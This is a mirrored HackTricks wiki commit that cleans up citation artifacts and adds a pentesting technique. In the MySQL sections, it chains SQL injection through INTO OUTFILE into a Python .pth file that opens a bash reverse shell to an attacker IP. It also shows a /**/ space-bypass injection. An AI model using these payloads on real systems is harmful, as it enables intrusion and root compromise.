maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Pre-auth SQL Injection to RCE in Fortinet FortiWeb Fabric Co...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-11 18:33:07 +00:00
parent b5fa7686cd
commit f5fdc6ec50
5 changed files with 90 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View File

@ -61,7 +61,7 @@ Java.perform(function () {
});
});
```
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later earlier versions failed to locate padding for inline hooks. citeturn5search2turn5search0
Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later earlier versions failed to locate padding for inline hooks.
---
@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)
| Year | CVE | Affected library | Notes |
|------|-----|------------------|-------|
|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
|2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
### References
- Frida 16.x change-log (Android hooking, tiny-function relocation) [frida.re/news](https://frida.re/news/) citeturn5search0
- NVD advisory for `libwebp` overflow CVE-2023-4863 [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
- Frida 16.x change-log (Android hooking, tiny-function relocation) [frida.re/news](https://frida.re/news/)
- NVD advisory for `libwebp` overflow CVE-2023-4863 [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
{{#include ../../banners/hacktricks-training.md}}

2
src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
View File

@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
### Automated dynamic analysis with MobSF (no jailbreak)
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest

55
src/network-services-pentesting/pentesting-mysql.md
View File

@ -1,5 +1,10 @@
# 3306 - Pentesting Mysql
{{#include /banners/hacktricks-training.md}}
## References
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}}
## **Basic Information**
@ -123,6 +128,52 @@ You can see in the docs the meaning of each privilege: [https://dev.mysql.com/do
../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
{{#endref}}
#### INTO OUTFILE → Python `.pth` RCE (site-specific configuration hooks)
Abusing the classic `INTO OUTFILE` primitive it is possible to obtain *arbitrary code execution* on targets that later run **Python** scripts.
1. Use `INTO OUTFILE` to drop a custom **`.pth`** file inside any directory loaded automatically by `site.py` (e.g. `.../lib/python3.10/site-packages/`).
2. The `.pth` file can contain a *single line* starting with `import ` followed by arbitrary Python code which will be executed every time the interpreter starts.
3. When the interpreter is implicitly executed by a CGI script (for example `/cgi-bin/ml-draw.py` with shebang `#!/bin/python`) the payload is executed with the same privileges as the web-server process (FortiWeb ran it as **root** → full pre-auth RCE).
Example `.pth` payload (single line, no spaces can be included in the final SQL payload, so hex/`UNHEX()` or string concatenation may be required):
```python
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
```
Example of crafting the file through an **UNION** query (space characters replaced with `/**/` to bypass an `sscanf("%128s")` space filter and keep the total length ≤128 bytes):
```sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
```
Important limitations & bypasses:
* `INTO OUTFILE` **cannot overwrite** existing files; choose a new filename.
* The file path is resolved **relative to MySQLs CWD**, so prefixing with `../../` helps to shorten the path and bypass absolute-path restrictions.
* If the attacker input is extracted with `%128s` (or similar) any space will truncate the payload; use MySQL comment sequences `/**/` or `/*!*/` to replace spaces.
* The MySQL user running the query needs the `FILE` privilege, but in many appliances (e.g. FortiWeb) the service runs as **root**, giving write access almost everywhere.
After dropping the `.pth`, simply request any CGI handled by the python interpreter to get code execution:
```
GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>
```
The Python process will import the malicious `.pth` automatically and execute the shell payload.
```
# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
---
## MySQL arbitrary read file by client
Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
@ -645,7 +696,9 @@ Entry_4:
## References
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../banners/hacktricks-training.md}}

4
src/pentesting-web/sql-injection/ms-access-sql-injection.md
View File

@ -141,7 +141,7 @@ Point the UNC path to:
* a host that drops the TCP handshake after `SYN-ACK`
* a firewall sinkhole
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984.
### Other Interesting functions
@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
* Block outbound SMB/WebDAV at the network boundary.
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent.
### .mdb Password Cracker

31
src/pentesting-web/sql-injection/mysql-injection/README.md
View File

@ -160,6 +160,32 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1);
More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
### Injection without SPACES (`/**/` comment trick)
Some applications sanitise or parse user input with functions such as `sscanf("%128s", buf)` which **stop at the first space character**.
Because MySQL treats the sequence `/**/` as a comment *and* as whitespace, it can be used to completely remove normal spaces from the payload while keeping the query syntactically valid.
Example time-based blind injection bypassing the space filter:
```http
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
```
Which the database receives as:
```sql
' OR SLEEP(5)-- -'
```
This is especially handy when:
* The controllable buffer is restricted in size (e.g. `%128s`) and spaces would prematurely terminate the input.
* Injecting through HTTP headers or other fields where normal spaces are stripped or used as separators.
* Combined with `INTO OUTFILE` primitives to achieve full pre-auth RCE (see the MySQL File RCE section).
---
### MySQL history
You ca see other executions inside the MySQL reading the table: **sys.x$statement_analysis**
@ -174,11 +200,12 @@ mysql> select version();
## Other MYSQL injection guides
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)]
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
## References
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
{{#include ../../../banners/hacktricks-training.md}}